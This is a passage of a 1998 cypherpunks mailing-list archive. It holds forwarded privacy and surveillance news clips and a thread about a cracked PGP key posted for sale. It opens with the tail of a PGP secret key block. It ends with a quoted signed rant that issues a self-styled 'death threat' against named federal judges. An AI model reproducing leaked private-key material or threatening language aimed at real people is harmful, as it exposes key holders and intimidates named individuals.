G7K9uGX/d/Rbtd0iP7aZ1iNDpgSakmNl5o3aYupCdQIAir0t68n1g91DzWwOMJKF
7E9fmQ21a7a2rDGk+5SV9nw3PxGwx/64CPHriDQz/ItYLPZKpHVLysuFGavYUFX/
26JZtB9zb24gb2YgZ29tZXogPEluZm9XYXJAZGV2Lm51bGw+
=yYBi
-----END PGP SECRET KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 15 Oct 1998 04:27:00 +0800
To: Jim Gillogly <jim@acm.org>
Subject: Re: ATTN: BlackNet, sog's keys 4 sale
In-Reply-To: <3624BFD1.7BB0BF77@acm.org>
Message-ID: <199810142000.NAA22600@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



even in cyberspace, what goes around comes around..!!
I've observed some keys/bits have a certain "stigma" attached to them.
you might get good press breaking other keys, but
not them.
yes, performance-artist-known-as-toto, 
there are black clouds even in cyberspace




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 15 Oct 1998 04:38:20 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Fwd: 10/13/98 MSNBC Special Report on Chem/Bio Attack; Tonight
Message-ID: <199810142012.NAA23588@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: RMORGAN762@aol.com
Subject: IP: Fwd: 10/13/98 MSNBC Special Report on Chem/Bio Attack; Tonight
Date: Wed, 14 Oct 1998 01:58:55 EDT
To: ignition-point@majordomo.pobox.com

This is a multi-part message in MIME format.

--part0_908344735_boundary
Content-ID: <0_908344735@inet_out.mail.aol.com.1>
Content-type: text/plain; charset=US-ASCII

 

--part0_908344735_boundary
Content-ID: <0_908344735@inet_out.mail.coil.com.2>
Content-type: message/rfc822
Content-transfer-encoding: 7bit
Content-disposition: inline

Return-Path: <freematt@coil.com>
Received: from  rly-zb04.mx.aol.com (rly-zb04.mail.aol.com [172.31.41.4]) by
	air-zb02.mail.aol.com (v50.18) with SMTP; Tue, 13 Oct 1998 16:56:55
	-0400
Received: from bronze.coil.com (bronze.coil.com [198.4.94.1])
	  by rly-zb04.mx.aol.com (8.8.8/8.8.5/AOL-4.0.0)
	  with ESMTP id QAA24021;
	  Tue, 13 Oct 1998 16:56:44 -0400 (EDT)
Received: from [198.4.94.178] (cmhb2.coil.com [198.4.94.178]) by
	bronze.coil.com (8.7.6/8.7.3) with ESMTP id RAA05736; Tue, 13 Oct
	1998 17:01:10 -0400 (EDT)
X-Sender: freematt@bronze.coil.com
Message-Id: <v04011700b2496e842512@[198.4.94.183]>
Date: Tue, 13 Oct 1998 17:02:14 -0400
To: Matthew Gaylor <freematt@coil.com>
From: Matthew Gaylor <freematt@coil.com>
Subject: 10/13/98  MSNBC Special Report on Chem/Bio Attack; Tonight
Mime-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit

EmergencyNet News Resource Announcement

10/13/98 - 15:00CDT

MSNBC Special Report on Chem/Bio Attack; Tonight

Chicago, IL (EmergencyNet News) -- According to program announcements,
MSNBC, on "The News with Brian Williams," will present a Special Report on a
potential chemical attack on a U.S. city. The program is scheduled for
tonight at 21:00EDT/18:00PDT.

Courtesy of:

Emergency Response & Research Institute
EmergencyNet News Service
6348 N. Milwaukee Ave. #312, Chicago, IL 60646, USA
(773) 631-3774 - Voice/Messages
(773) 631-4703 - Fax
(773) 631-0517 - Modem/Emergency BBS On-Line Service
http://www.emergency.com - Website
webmaster@emergency.com - E-Mail

**************************************************************************
Subscribe to Freematt's Alerts: Pro-Individual Rights Issues
Send a blank message to: freematt@coil.com with the words subscribe FA
on the subject line. List is private and moderated (7-30 messages per week)
Matthew Gaylor,1933 E. Dublin-Granville Rd.,#176, Columbus, OH  43229
Archived at http://www.reference.com/cgi-bin/pn/listarch?list=FA@coil.com
**************************************************************************

--part0_908344735_boundary--




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 15 Oct 1998 04:43:24 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.38: TRUSTe is Creating a New Child Privacy Program
Message-ID: <199810142012.NAA23599@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.38: TRUSTe is Creating a New Child Privacy Program
Date: Wed, 14 Oct 1998 00:12:32 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.38: TRUSTe is Creating a New Child Privacy Program
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Wednesday October 14, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: CNET News.com, October 13, 1998
http://www.news.com


New Guidelines on Child Privacy
http://www.news.com/News/Item/0,4,27489,00.html?dd.ne.tx.fs2.1013

By
Tim Clark and Courtney Macavinta
Staff Writers, CNET News.com


Industry group TRUSTe [ http://www.truste.org/ ] is creating a new child
privacy program that it hopes will address issues raised by the Federal
Trade Commission and the so-called Bryan bill now pending in Congress.

The FTC has reviewed TRUSTe's child privacy guidelines, which generally bar
Web sites from collecting personal information from children under 13
without verifiable parental permission. They also require child-oriented
Web sites to state clearly and prominently what information is being
collected and how it is shared.

"We want to help these sites catering to kids implement the bill," said
Susan Scott, TRUSTe executive director. "We have created a unique
children's seals, and to get that seal, sites need to comply with all the
FTC requirements to create and implement privacy statements."

Authored by Sen. Richard Bryan (D-Nevada), the Children's Online Privacy
Protection Act was tacked on to the Internet Tax Freedom Act. The provision
requires parental consent before Internet sites can collect information
online from children age 12 and under.

TRUSTe backs the Bryan bill but is concerned that is currently tied to
Internet censorship legislation.

One major children's site, Yahooligans plans to post TRUSTe's new child
privacy seal because it says its practices comply with TRUSTe's guidelines.
TRUSTe is talking to another major children's site, Disney about joining
the program too.

"Our privacy practices are in compliance with keeping a safe environment on
the Web," said Rob McHugh, senior producer for Yahooligans, which has
updated its privacy statement but not changed its practices to obtain the
children's privacy seal. Yahooligans collects first names, age, gender, and
home state, but no individually identifiable information, such email or
physical address.

"The practices are in effect right now for any new applicants [for TRUSTe's
logo] for sites directed at kids under 13," Scott said.

TRUSTe hopes its guidelines will become a "safe harbor" for child-oriented
sites. That means the FTC would accept a site's use of the TRUSTe child
privacy mark as evidence the site is following the law, with TRUSTe
essentially becoming an enforcement arm.

The FTC still must promulgate regulations on child privacy, and TRUSTe
expects to alter its guidelines based on the federal agency's final rules,
which may not be completed for a year. Scott expects no major changes.

The Bryan bill would be the first online privacy legislation to pass,
giving the FTC authority it previously felt it didn't have to enforce
privacy rules.

Scott predicts that requiring parental permission before collecting
personal data on children will reduce the amount of information sites
request.

"The cost of business has gone up because of the verification [that parents
approve]," she said. "Sites will need to look at their business models to
see if they need that personal information."

Scott praised Bryan for taking industry concerns into account by altering
the initial legislation, for example, to apply specifically to commercial
sites--not nonprofits--and by limiting the parental permission requirement
to children 12 years and under, not ages 13 to 19.

The Net Tax Freedom Act is still in limbo today as Congress's session comes
down to the wire. The Senate passed the three-year moratorium on new Net
taxes, but if the House doesn't push it through as is then Congress will
likely run out of time to pass the legislation.

There is speculation, however, that the tax moratorium will be attached to
omnibus spending legislation that could be passed by midnight tomorrow
before both houses adjourn. If the bill is passed, the child privacy
protections also will be ushered into law.

But the Net tax bill also contains a controversial provision by Sen. Dan
Coats (R-Indiana) that exempts commercial sites from the tax break if they
give minors unfettered access to "harmful" material.


Specifically, TRUSTe's Children's Seal Program requires that licensees not:

*Collect information from a child under 13 without parental consent or
direct parental notification of the nature and intended use of the data.
Parents should be able to prevent use of the information.

*Collect personally identifiable offline contact information from children
under 13 without parental consent.

*Distribute to third parties any personal data collected from a child under
13 without parental consent.

*Allow children under 13 to publicly post or otherwise distribute personal
information without parental consent. Sites must try to prohibit children
from posting any contact information.

*Use a games or prizes to entice a child under 13 to divulge more
information than is needed.

Copyright (c) 1995-98 CNET, Inc.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.












**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 15 Oct 1998 04:42:55 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.42: Poll Shows 75% of Canadians Worry About Internet privacy
Message-ID: <199810142012.NAA23610@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.42: Poll Shows 75% of Canadians Worry About Internet privacy
Date: Wed, 14 Oct 1998 00:15:56 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.42: Poll Shows 75% of Canadians Worry About Internet privacy
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Wednesday October 14, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The Toronto Sun, October 2, 1998
http://www.thestar.com

1 in 3 plan to buy online, poll reveals
But Canadians still worry about privacy, security
http://www.thestar.com/back_issues/ED19981002/news/981002NEW06_NA-POLL2.htm
l

By
Valerie Lawton
Toronto Star Ottawa Bureau

OTTAWA - More than one in three Canadians expect to buy something over the
Internet within the next couple of years, a poll suggests.

``That's a much higher figure than anything we've seen,'' said Frank
Graves, president of Ekos Research Associates.

``We're talking about a pretty radical transformation of the marketplace,
the world of commerce, in a very short period of time.''

The results of the Ekos survey are to be released today.

Canadians also told the pollster they have a number of worries about buying
online.

About three-quarters of those asked said they would not be willing to give
their credit card number over the Internet even if they were buying
something from a well-known business.

And Graves said the poll found people would be more willing to shop on the
Internet if privacy and consumer protection measures were introduced.

It's an important message for business and government, said Andrew Reddick
of the Public Interest Advocacy Centre in Ottawa.

``They have to put consumers first if they want this to work,'' said
Reddick, whose centre also worked on the E-commerce study.

He's skeptical of the finding that one in three people plan to buy over the
Internet soon.

``It may be wishful thinking. It may be showing a high level of interest,''
he said.

``A lot of people aren't on the Internet - 75 per cent roughly still aren't
connected from the home.''

Some 7 per cent of Canadians said they had shopped on the Internet at some
point during the three months before the poll was taken.

Ekos has conducted three surveys on E-commerce over the last year or so.
The most recent, a telephone survey in June, involved 2,200 interviews - a
sampling that's said to be accurate within 2.1 percentage points, 19 times
out of 20.

In Ottawa yesterday, the federal government tabled legislation that
includes measures to protect personal information.

``For electronic commerce to flourish, we need confidence in how our
personal information is gathered, stored and used and clear rules for
industry,'' said Industry Minister John Manley.

The minister also announced yesterday that the government will take a
hands-off approach to cryptography, a method which encodes data so that
only individuals with the proper digital ``key'' are able to decipher it.

Copyright (c) 1996-1998, The Toronto Star.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.











**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 15 Oct 1998 04:38:17 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Surveillance: Candid camera for criminals
Message-ID: <199810142012.NAA23621@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Surveillance: Candid camera for criminals
Date: Wed, 14 Oct 1998 08:09:13 -0500
To: believer@telepath.com

Source:  BBC
http://news.bbc.co.uk/hi/english/uk/newsid_191000/191692.stm 

Tuesday, October 13, 1998 Published at 18:48 GMT 
19:48 UK 
UK 

Candid camera for criminals 

Three steps to criminal-spotting 

A revolutionary surveillance system that can pin-point known criminals as
they walk along in a crowd is being put to the test in a London borough. 

The Mandrake face recognition system will seek out 'target faces' in the
closed circuit television (CCTV) footage in the Newham area. 
  
Councillor Ian Corbett said the decision to go ahead with the &pound;60,000
six-month trial was made in response to the concerns of local residents.
"We've done surveys recently and 60% of the population said that crime
prevention was the No 1 issue in the community," Mr Corbett said. 

But fears of innocent people being identified by mistake have lead civil
liberties groups to condemn the system and call for it to be tightly
regulated. 

Making a match 

Newham has a network of 140 street cameras as well as 11 mobile camera units. 

Images beamed into the council's security centre in East Ham will be
compared with a database of target faces supplied by police. 
  
The system can isolate the targets from the crowds of people appearing on
CCTV. When a match is made the computer highlights the target and sounds an
alarm. 

An operator then checks the image and decides if it is necessary to contact
the police. 
  
The police in the area see the system as a way of making CCTV more efficient. 

"The people who go onto the system will be convicted criminals," said Chief
Superintendent David Armond. 

Depending on the success of the trial, other targets like paedophiles could
also be scanned. The system could also be used to help track down missing
persons. 

Advanced technology 

Mandrake is the first identification system to be able to work from moving
pictures. It has been designed by Software Systems International which has
been concentrating on identification systems for several years. 

Less advanced systems are already in operation, including one which
compares pictures of criminals with individuals crossing the Mexican border. 

One state in the US is using a database of millions of pictures to check on
people who may be entering into more than one marriage, and another state
is checking for duplicate drivers' licence applications in the same way. 

"The ability to capture a moving face is quite a new innovation and makes a
lot of difference to being able to work with things like CCTV," Software
Systems marketing manager Pat Oldcorn said. 

However she acknowledges that the computer will not always strike a perfect
match. 

"We do expect that we will get a little bit of difference in interpretation
because sometimes it will pick up a face at a three-quarters angle. We will
need to use the human element to check the authenticity of the picture,"
she said. 

Big brother concerns 

It is the risk of error that has the civil liberties group Liberty most
concerned. 

"The accuracy of facial mapping is very limited," campaigns manager Liz
Parratt said. 

"For example, you need only to look at a handful of photos of celebrities
to see how different the same people can look in different photos." 

"The claim that those who have nothing to hide have nothing to fear is
rubbish. What the police call an 80% success rate is what we would call a
one in five chance of a mistake." 

Ms Parratt said that even if the system did work, it would have to be
carefully regulated to protect people's privacy. 

But Councillor Corbett said he was most concerned about the civil liberties
of innocent people. 

A reduction in the crime rate in Newham over the next six months will
persude the Labour-dominated council to continue with the system. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 15 Oct 1998 04:41:41 +0800
To: cypherpunks@cyberpass.net
Subject: IP: The Road to Biometric IDs: Identity Theft
Message-ID: <199810142012.NAA23634@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: The Road to Biometric IDs: Identity Theft
Date: Wed, 14 Oct 1998 08:39:43 -0500
To: believer@telepath.com

Source:  ABC
http://www.abcnews.com/sections/us/DailyNews/id_theft981006.html

When Someone Else Becomes You - Identity Crisis 
Lost Privacy is Price of Information Revolution

***
"You feel like [your credit rating] is a mark of integrity, and  then
you're treated like a criminal and the whole onus is on you to prove you
didn't do it." - identity theft  victim Amy DuBois
***

Could someone morph into you? (ABCNEWS.com) 

 By Jan M. Faust
 ABCNEWS.com

 Oct. 9 - Babies are targeted. So are ex-lovers, ex-roommates, ex-friends
and ex-spouses. And oh yeah, strangers too. People who use the Internet are
definitely at risk. And so are those who don't.

When it comes to identity theft-the pilfering of someone's personal data to
get a free ride on a clean record or bountiful credit-the scams are so
wide-ranging that there can be no generalization about who will get hit and
who won't.

Although there are no definite numbers on the incidence of identity theft
in the United States, it is believed to be
 on an explosive trajectory. Last year, Trans Union, one of the nation's
three major credit bureaus, reported approximately 350,000 cases of
identity fraud. And, the U.S. Secret Service, a wing of the Treasury
Department that gets involved on the larger cases, arrested approximately
10,000 people for participating in organized identity theft rings.

As the numbers keep mushrooming, so have costs-up from $442 million in 1995
to $745 million in 1997, says Assistant Deputy James Bauer of the Secret
Service. "So there's been a significant increase in the losses that tell us
they're doing it more and applying a certain level of expertise."

 Your Money and/or Your Life

 When your evil doppelgangers go for convertible sports cars, or chunky
diamond necklaces, more than your credit rating can be damaged. 

"I can promise you the day you learn of it you are at least 18 months from
being whole again, " says Bauer. "During which time you can't buy a car,
get a loan, maybe you're turned down for a job, and you may not even know why.

Amy DuBois knows this firsthand. The 34-year-old Boston surgeon was
swindled in what seemed a simple purse filching from her locked desk at the
hospital. She took immediate, and what she assumed was adequate, action by
canceling her credit cards and checks.

Once that might have been enough. But as Bauer points out, new safeguards
in the credit industry, like real-time verification of credit cards, have
forced thieves to get craftier.

The end result is that now, "Pickpockets will steal your wallet, and I say
this facetiously, but they'll give you back the cash, just to get the IDs,"
says Bauer. 

 Instant Credit Can Be an Instant Headache

 Although DuBois never recovered her purse or the money in it, it was the
identification that was the real commodity. "Nearly two years later,"
DuBois says, "I got a phone call at home from a collection agency about an
overdue credit account of $3,500 from a jewelry store in Detroit.

"And then they started coming-I got two more notices in the mail, and two
by phone within the next couple of days." When she checked her credit
report, she found that almost $30,000 dollars of jewelry, roaming cell
phone charges, and department store items had been racked up in her name,
from accounts made at department stores with instant credit, billed to
addresses that weren't hers. 

"The instant credit folks, like the departments stores, they're not
checking or verifying because they're so eager to have new customers,
because it's so competitive," says Beth Givens of the Privacy Rights
Clearinghouse, whose consumer organization publishes help for victims. "I
think the blame for a good bit of this epidemic lays at the feet of the
credit industry." 

 Will the Real Amy DuBois Stand Up?

 The fake Amy DuBois, it turned out, was a serious shopaholic. The real
DuBois said that seeing her own credit report was "eerie"

"Your student loans are there, your own Neiman-Marcus account, and then
next to those are nine accounts that just aren't yours, marked delinquent."

After 30 hours of her own time, four uninterrupted days of her secretary's
time, and about $1,000 in lawyer's fees, DuBois is gradually starting to
sort things out. That's typical, explains Ed Mierswinsky, a consumer
advocate at the U.S. Public Interest Research Group. 

"The victims end up in a real mess. They sit on hold with the credit card
companies, they sit on hold with the credit bureaus, they get on endless
voice mail loops, the police don't care because the amount of money lost
doesn't make their threshold for making major cases and getting promotions."

For DuBois, what lingers now besides the voluminous paperwork needed to be
filed whenever she legitimately needs to establish credit, is suspicion and
mistrust about giving out her personal identifiers. 

Recently while trying to open an account at Blockbuster Video, she was
asked for her driver's license and Social Security number. "I said, 'No,
I'm not providing that. You don't need to have that.'" Although she
eventually relented on the driver's license, she said she's much more
protective of her Social Security number. 

 Give Me Some Credit Here

 Guarding that precious number is one key to improving your odds, agree
privacy rights advocates. Criminals will try to liberate it from you in a
number of ways, as low-tech as sifting through your garbage can for
records, and as high-tech as setting up application forms on Internet sites
offering credit cards at the impossibly low, low rate of 1 percent APR. 

And since it's extremely difficult to eliminate risk, Givens suggests
ordering your credit report at least once a year. "The key is to catch it
early. We recommend just going to one of the three credit bureaus, and if
you see signs of fraud, then order the other two."

That would have helped DuBois, who's says she'll feel insecure and violated
for the rest of her life.

"It's a very strange sensation. I have a very good credit record, I've been
very careful. You feel like it's a mark of integrity, and then you're
treated like a criminal and the whole onus is on you to prove you didn't do
it. The whole thing is very frightening." 

For all of her expense and troubles, DuBois' experience could have been
worse. More damaging than run-of-the-mill credit theft are those cases
where criminal records or vital statistics are affected, through marriage,
divorce, an arrest, or even death under the cloned name. 

"I know of a case out West where a lady died using an assumed name," says
Bauer, "and the true name holder had to get a death certificate undone." 

Recent Examples of Identity Theft 

In New York this week, the state attorney general warned of a scam being
circulated through e-mail, faxes and fliers offering consumers a
reimbursement of $500 from Gerber Baby foods as settlement in a phony class
action. To apply, parents were asked to send copies of their child's birth
certificate and Social Security card. Babies' Social Security numbers are
plum because they allow for unflawed credit, and are rarely checked for
fraud. John and Jane Smith's adult daughter obtained credit cards in their
name and ran up debts of more than
$40,000. She paid the interest fees so as not to alert her parents of her
use of the credit cards, but was not able to keep up the payments. The
credit card companies now demand the Smiths pay the bill, given that the
debtor is their daughter.

A thief stole Annette's wallet, and has since written bad checks in her
name, and used her credit cards. Annette
wonders if anyone pays attention to driver's license photos. The thief is
white and Annette is African-American. To make matters worse, she has to
pay $10 every time she needs a notarized affidavit stating she is not the
crook. 

Meredith rented a room in her home to a woman who found her SSN. She
collected the pre-approved offers of
credit that were mailed to the house, filled them out in Meredith's name,
and obtained 15 credit cards. She
watched the mail and retrieved the monthly statements before Meredith saw
them. She has since moved out,
leaving Meredith with debts totaling $74,000. 

Francine was employed for a time as a writer for a publishing company.
After she left, she found that her
employer was using her SSN and driver's license number to obtain credit in
her name. A police department
detective investigating the case told Francine that the woman has a long
history of identity theft spanning many
states. 

Cheryl and her 7-year-old daughter went to the bank to open a checking
account for the daughter. The bank told
Cheryl her daughter had a bad credit report. Cheryl thinks that her
ex-husband has been using the child's Social
Security number to open credit accounts.  
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Oct 1998 20:53:19 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: ATTN: BlackNet, sog's keys 4 sale
In-Reply-To: <v03130307b249d4908a73@[209.66.100.146]>
Message-ID: <199810141212.NAA30027@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Wew.  The Son Of Gomez key I just decrypted and posted... it's not
just _any_ Toto key, it's _the_ key.  The 0x2541C535 one, the one that
signed the message in question.

Try it out.  [1] the message, [2] the keys.
(http://www.well.com/user/declan/toto/toto.pgp.120997.txt)

(Subject line in archives was "Encrypted InterNet DEATH THREAT!!!").

Implications?  Others had CJs keys?  Toto is someone other than CJ?

Adam

[1]
======================================================================
-----BEGIN PGP SIGNED MESSAGE-----



"Contrary to one famous philosopher,
you're saying the medium is not the
message," Judge Thomas Nelson said,
alluding to the media theorist Marshall
McLuhan. 
http://www.nytimes.com/library/cyber/week/120997encrypt-bernstein.html

  Bullshit!
  The bits and bytes of email encryption are a clear message
that I wish to exercise my right to speak freely, without those
who wish to do me harm invading my privacy.
  The death of strong encryption on the InterNet will be the
global death of free speech on the InterNet. Accordingly, I 
feel it is necessary to make a stand and declare that I stand
ready and willing to fight to the death against anyone who
takes it upon themselves to try to imprison me behind an
ElectroMagnetic Curtain.

  This includes the Ninth Distric Court judges, if they come to
the conclusion that the government that they represent needs to
electronically imprison their citizens 'for their own safety.'


The problem: Criminals with a simple
encryption program can scramble their data
beyond even the government's ability to read it. 
http://www.zdnet.com/zdnn/content/zdnn/1208/261695.html

  Fuck the lame LEA pricks who whine about not being able to
stop someone bringing in a planeload of drugs without being
able to invade the privacy of every person on the face of
the earth.
  Am I supposed to believe that I have knowledge of when and
where major drug shipments are taking place, simply by virtue
of hanging out as a musician, yet the LEA's are incapable of
finding out the same information by being competent in their
profession? Barf City...
 [I will shortly provide information for any LEA which wishes
  to prosecute me for my coming 'physical' death threat, on
  how to hunt me down like the filthy dog that I am.]

"Why are you saying that the fact that [encryption]
is functional takes it out of the First Amendment
context?" Myron Bright, one of the judges, asked
the Justice Department attorney, who was still in
mid-sentence. He answered that the regulations
were not aimed at suppressing speech, but only at
the physical capacity of encryption to thwart
government intelligence gathering. 

  The Spanish language has the same "physical capacity." So 
does (:>), (;[), and {;-|). Likewise, BTW, FWIW, FYI, and
my own personal favorite, YMMV (You Make Me Vomit? --or--
Your Mileage May Vary?). <-- Ambidextrous encryption.
  An-cay e-way pect-exay ig-pay atin-lay usts-bay of 
ildren-chay?
  Whispering also has the "physical capacity" to "thwart 
government intelligence gathering."

  When does the bullshit stop? When do we stop making the
use of the Spanish language over the InterNet illegal?
When do we stop making whispering, pig-latin, anagrams
and acronyms illegal?
  When do we stop saying that our government is such a
piece of crap that it is a danger to let its citizens
communicate freely, in private, and share their private
thoughts with one another?


At one point Fletcher called the government's case 
"puzzling."
http://www.news.com/News/Item/0,4,17114,00.html

  Only because her mom taught her that it was unladylike to
say "Bullshit!"


In arguments Monday, a Justice Department
lawyer, Scott McIntosh, said the government's
intent was to preserve the ability of intelligence
agencies to eavesdrop on foreign governments
and citizens. 
http://www.nytimes.com/library/cyber/week/120997encrypt-bernstein.html

  Let's see if I have this right...
  The U.S. government needs to destroy the right to free speech 
and right to privacy of its own citizens in order to infringe
upon the human rights of the governments and citizens of other
countries? Countries which already have strong encryption?
Countries like Red China, which is currently engaged in 
encryption research with an American company who got permission
to export much more diverse encryption material (after making
a huge campaign donation to the Whitehouse) than Professor
Bernstein will ever likely share with others?
  Apologies to Judge Fletcher, but that's not "puzzling." That's
the same-old-same-old Bullshit!


OFFICIAL 'PHYSICAL' DEATH THREAT!!!
  The pen is mightier than the sword. Thus, I prefer to wage my
'war to the death' against those who would stomp on my basic
human rights *"in the interests of National Security"* with my
electronic pen, on the InterNet, using encryption when I have
reason to fear persecution by Facist, Nazi motherfuckers.
[* ~~ TruthMonger Vernacular Translation ~~ "so that the 
 government can maintain its authority over the citizens
 by use of force and violation of human rights, rather than
 going to all of the trouble of acting in a manner that will
 garner the citizens' respect."]

  I will continue to express my thoughts through the words
I send electronically over the InterNet, both publically
and privately. I will fight to the bandwidth death against
anyone who wants to deny me my right to express my opinions
and access the opinions of those who also wish to express
their own opinions and share their true thoughts with their
fellow humans.
  If the ElectronicMagnetic Curtain slams down around me, 
then I will have no choice but to continue my current fight
in MeatSpace.
  And I am not alone...

  I will share the same 'DEATH THREAT!!!' with Judges Fletcher,
Nelson and Bright that I have shared with the President and
a host of Congressional and Senatorial representatives:
  "You can fuck some of the people all of the time, and all of
the people some of the time, but you are going to end up in a
body bag or a pine box before you manage to fuck all of the
people all of the time."

